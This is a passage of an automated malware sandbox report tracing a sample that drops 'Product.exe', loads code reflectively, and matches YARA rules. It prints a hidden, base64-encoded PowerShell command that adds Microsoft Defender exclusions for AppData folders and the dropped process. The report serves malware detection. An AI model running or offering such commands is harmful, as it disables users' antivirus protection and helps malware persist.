                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: test.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: test.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: test.exe, 00000000.00000002.1508460985.0000000004723000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1514008750.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1505562731.0000000003312000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.0000000003402000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Plvuxr.pdb source: test.exe, 00000000.00000002.1511424136.0000000005550000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: test.exe, test.exe, 00000000.00000002.1508460985.0000000004723000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1514008750.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1505562731.0000000003312000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.0000000003402000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Plvuxr.pdbx source: test.exe, 00000000.00000002.1511424136.0000000005550000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: test.exe, ParameterObject.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: test.exe, DefinitionBridge.cs.Net Code: SpecifyExternalDefinition System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.test.exe.5790000.13.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.test.exe.5790000.13.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.test.exe.5790000.13.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.test.exe.5790000.13.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.test.exe.5790000.13.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.test.exe.4665468.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.test.exe.4665468.9.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.test.exe.4665468.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.test.exe.4665468.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.test.exe.4665468.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                      Source: Yara matchFile source: 4.2.Product.exe.43c6b88.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Product.exe.3b16b88.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.test.exe.5730000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.InstallUtil.exe.3c96b88.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.test.exe.42d6b88.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2234027771.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1508460985.0000000004252000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1555656031.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1512992547.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2739969270.0000000003C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2217363905.000000000291D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1505562731.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2722239626.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: test.exe PID: 2876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Product.exe PID: 5136, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Product.exe PID: 6904, type: MEMORYSTR
                      Source: test.exeStatic PE information: 0xDFD6F372 [Sat Jan 1 08:23:14 2089 UTC]
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056A9804 push es; ret 0_2_056A9807
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B0DF8 push 8B000001h; iretd 0_2_056B0DFD
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B162F pushfd ; retf 0_2_056B163D
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056BC6D9 push eax; iretd 0_2_056BC6E5
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B0EB2 push eax; retf 0_2_056B0EB3
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057FE963 push eax; iretd 0_2_057FE969
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F1900 push eax; retf 0_2_057F1901
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF88737D2A5 pushad ; iretd 2_2_00007FF88737D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8874900BD pushad ; iretd 2_2_00007FF8874900C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887563330 push eax; iretd 2_2_00007FF887563331
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887562316 push 8B485F91h; iretd 2_2_00007FF88756231B
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05879804 push es; ret 4_2_05879807
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05880DF8 push 8B000001h; iretd 4_2_05880DFD
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05880EB2 push eax; retf 4_2_05880EB3
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_0588C6D9 push eax; iretd 4_2_0588C6E5
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C7774 pushad ; iretd 4_2_059C777D
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C1900 push eax; retf 4_2_059C1901
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051E9804 push es; ret 5_2_051E9807
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F0DF8 push 8B000001h; iretd 5_2_051F0DFD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F0EB2 push eax; retf 5_2_051F0EB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051FC6D9 push eax; iretd 5_2_051FC6E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05331900 push eax; retf 5_2_05331901
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05567E86 push es; ret 5_2_05567E87
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F0DF8 push 8B000001h; iretd 12_2_052F0DFD
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F162F pushfd ; retf 12_2_052F163D
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F0EB2 push eax; retf 12_2_052F0EB3
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052FC6D9 push eax; iretd 12_2_052FC6E5
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_05431900 push eax; retf 12_2_05431901
                      Source: test.exeStatic PE information: section name: .text entropy: 7.943479566691634
                      Source: Product.exe.0.drStatic PE information: section name: .text entropy: 7.943479566691634
                      Source: C:\Users\user\Desktop\test.exeFile created: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
